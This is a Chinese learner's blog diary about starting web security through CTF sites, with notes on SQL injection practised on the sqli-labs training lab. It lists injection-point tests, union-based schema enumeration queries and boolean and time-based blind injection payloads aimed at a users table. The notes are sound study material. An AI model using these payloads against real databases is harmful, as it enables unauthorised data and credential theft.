20200226 SQL注入及杂项

记录

自从10多号开始自学安全后,感觉速度快了点,怕忘记就在本地每天打卡总结,但今天突发奇想为何不在网上打卡捏,于是就有了本文

稍微记录几个时间点:

  • 20190522 了解到了有CTF这个比赛

  • 201911 突然开始学逆向,我也不知道为何要先学逆向(Web安全不香吗),不过一周后就没学了,其实就是懒!

  • 20191210 开始学DVWA,学会使用PHPstudy,DVWA粗略学了点,没啥感觉

  • 201912 加入了一个教学群

  • 202001 图书馆借了基本书打算寒假看,一本道哥的,一本将XSS,一本kali,但是根本看不进去(太真实了)

  • 20200209 B站上发现了一个很基础的安全教程(网易云课堂的,帮运过来的,后来要到了免费资源链接就去看了看,真的是最最基础的教程,很良心!原本这段时间我是打算练魔方的,打算avg11的,但我选择了安全。之后的一周就在看这个视频,不过看得慢,想打好基础。

  • 20200217 第一次做题,网址是http://hackthissite.org/就是那个教程分享的,过是一个外国网站,稍有吃力

  • 20200220 加入了bugbank入门群,解决了burpsuite无法抓取https包的问题

  • 20200221 来到了HackingLab开始了做题之旅了,结合之前的教程以及网上的WP慢慢学习,一天时间才从选择题和基础关做到脚本关第2题,这一题是要写一个脚本,这也是我的第一个脚本。

  • 20200222 因为之前稍微了解python,要写脚本就复习了下python,了解request模块和re模块及正则表达式,说实话,我的学习力比较差,一开始就单单re模块和正则那部分学了半个上午半个下午,晚饭前终于搞定了那个脚本

  • 20200223 遇到了一个巨难的题(脚本关第8题),是一个关于PHP代码审计的,这一题做完的时候天已经黑了

SQL I‘m coming

从24号左右就开始了注入关,前三关看WP还是比较简单的,但是我是边看边学的,对于SQL注入的基本原理就不是很清楚,于是25号就打算单开一天学SQL注入,结果……我太年轻了,到了那天晚上才发现SQL不简单,所以接下来的一周时间基本上就是与SQL注入打交道了,视频的话,我是看B站上的 crow up主的sqli教程,其余就参考网上的文章

主要就是通过sqli-labs这个平台学习,里面的SQL注入类型丰富,够啃一阵子了

前两日SQL注入总结 (ง'-')ง

之前学得有点零散,早上也起得比较晚,就打算总结前两天所学的

基本SQL注入步骤

  1. 找到注入点
 1' or 1=1 #
 1 or 1=1 
 1" or 1=1 #
 1') or 1=1 #
 ​
 -- 一些编码
 ’ %27
 # %23
  %20
 “ %22
  1. 看有没有回显
order by 3#
-1' union select 1,2,3#
 ​
 -- 没有回显的话,就属于盲注系列了
  1. 获取数据
select database();
select user();
select version();
select @@datadir;  # MySQL安装路径
select @@version_compile_os;  #电脑系统
select schema_name  from information_schema.schemata;
select table_name from information_schema.tables where table_schema = 'security';
select column_name from information_schema.column where column_schema = 'users';
select username,password from security.users;

有趣的函数(ง'-')ง

group_concat("name")  # 列举name列所有字段
concat_ws('~',name,password)  # 以name~password形式输出
concat(”name“)  # 用法类似

盲注 (・ω・)=つ

来人,上笔记!

盲注 布尔型

跑库名
 +--------------------+
 | Database           |
 +--------------------+
 | information_schema |
 | challenges         |
 | dvwa               |
 | mysql              |
 | performance_schema |
 | security           |
 | test               |
 +--------------------+
  1' or substr((select database()),1,1)='s'#
  1' or substr((select schema_name from information_schema.schemata limit 0,1),1,1)='I'#

  跑表名
 +----------------+
 | SecurityTables |
 +----------------+
 | emails         |
 | referers       |
 | uagents        |
 | users          |
 +----------------+
  1' or substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e'#

  跑列名
 +----+----------+------------+
 | id | username | password   |
 +----+----------+------------+
 |  1 | Dumb     | Dumb       |
 |  2 | Angelina | I-kill-you |
 |  3 | Dummy    | p@ssword   |
 |  4 | secure   | crappy     |
 |  5 | stupid   | stupidity  |
 |  6 | superman | genious    |
 |  7 | batman   | mob!le     |
 |  8 | admin    | admin      |
 |  9 | admin1   | admin1     |
 | 10 | admin2   | admin2     |
 | 11 | admin3   | admin3     |
 | 12 | dhakkan  | dumbo      |
 | 14 | admin4   | admin4     |
 +----+----------+------------+

  1' or substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)#  //不同库会有相同的列名
  1' or select substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 2,1),1,10) c#
  这里最好把库名和列名都写出了,避免出现不同库相同列名的情况

  跑字段 

  1' and select substr((select username from security.users limit 0,1),1,1)#

盲注 延时型

跑库名
 +--------------------+
 | Database           |
 +--------------------+
 | information_schema |
 | challenges         |
 | dvwa               |
 | mysql              |
 | performance_schema |
 | security           |
 | test               |
 +--------------------+
  1' or if(substr((select database()),1,1)='s',1,sleep(5)) #
  1' or if(substr((select schema_name from information_schema.schemata limit 0,1),1,1)='I',1,sleep(5)) #

  跑表名
 +----------------+
 | SecurityTables |
 +----------------+
 | emails         |
 | referers       |
 | uagents        |
 | users          |
 +----------------+
  1' or if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e',1,sleep(5))#

  跑列名
 +----+----------+------------+
 | id | username | password   |
 +----+----------+------------+
 |  1 | Dumb     | Dumb       |
 |  2 | Angelina | I-kill-you |
 |  3 | Dummy    | p@ssword   |
 |  4 | secure   | crappy     |
 |  5 | stupid   | stupidity  |
 |  6 | superman | genious    |
 |  7 | batman   | mob!le     |
 |  8 | admin    | admin      |
 |  9 | admin1   | admin1     |
 | 10 | admin2   | admin2     |
 | 11 | admin3   | admin3     |
 | 12 | dhakkan  | dumbo      |
 | 14 | admin4   | admin4     |
 +----+----------+------------+ 
  //精确到了库和表,是可以跑出id的
  1' and if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1),1,1)='u',1,sleep(5))#

  跑字段
  1' and if(substr((select username from security.users limit 0,1),1,1)='D',1,sleep(5));

杂项 _(:τ」∠) _

  • burpsuite抓不到本地包

    学安全避免不了破解版工具的使用,前几天的burpsuite能抓远程包,今天突然抓不到本地包了,郁闷~~

    后来将localhost和127.0.0.1改为本地的IP地址就可以了(比如http://192.168.1.1/sqli/less-11

PS:没想到这个markdown编辑功能这么差,哎,代码块部分明天在处理下,有点难看。。。

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 216,919评论 6 502
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 92,567评论 3 392
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 163,316评论 0 353
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 58,294评论 1 292
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 67,318评论 6 390
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 51,245评论 1 299
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 40,120评论 3 418
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,964评论 0 275
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 45,376评论 1 313
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,592评论 2 333
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,764评论 1 348
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 35,460评论 5 344
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 41,070评论 3 327
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,697评论 0 22
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,846评论 1 269
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 47,819评论 2 370
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,665评论 2 354

推荐阅读更多精彩内容

  • 1.何为Sql注入? 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最...
    打伞De鱼666阅读 1,442评论 0 7
  • SQL注入漏洞概述:所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终...
    kotw_zjc阅读 2,310评论 0 0
  • 安全级别:low 使用手工注入 目标:http://192.168.2.35/dvwa/vulnerabiliti...
    小浪崇礼阅读 357评论 0 1
  • Web基础知识 1 HTTP介绍 HTTP协议(HyperText Transfer Protocol,超文本传输...
    亦zZ阅读 541评论 0 0
  • DVWA实践 Web漏洞原理 1. DVWA环境搭建 Warmpserver+DVWA 2. Brute Forc...
    JasonChiu17阅读 3,752评论 0 19